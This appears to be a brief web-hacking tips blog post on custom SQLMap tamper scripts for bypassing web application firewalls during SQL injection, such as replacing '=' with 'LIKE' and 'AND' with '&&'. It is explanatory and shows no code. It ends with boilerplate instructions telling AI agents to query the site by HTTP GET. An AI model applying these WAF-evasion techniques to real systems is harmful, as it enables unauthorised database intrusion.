# Week 9 - SQLMap Tamper Scripts ## SQLMap Custom Tamper Scripts Well, it’s Monday which means another Web App Hacking Tip! In week 9 we’ll be covering custom SQLMap Tamper scripts.\ \ SQL Injection is a common vulnerability found in web applications and depending on the app, exploitation usually means bypassing some kind of Web Application Firewall (WAF). SQLMap has default tamper scripts that are useful (space2comment, charencode, randomcase), but they don’t always get the job done. I’ve found the most useful solution is to just write your own!\ \ To start off, I recommend proxying your SQLMap traffic through Burp Suite (see below images). This will allow you to see exactly what the WAF is blocking, and how the app responds. From there, you can craft your script to replace any characters/words that trigger the Firewall.\ \ In the below images, the tamper script replaces the ‘=’ sign with ‘LIKE’, and the ‘AND’ operator with ‘&&’. This tip pairs extremely well with Week 7’s Custom Payload creation, so I highly recommend checking that out if you enjoy SQL Injections!\ ![](/files/L1uZNyWP3wpBwDszODgl) ![](/files/gO74VBYPVcpZw30WGLJB) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.webhackingtips.com/weekly-tips/week-9-sqlmap-tamper-scripts.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.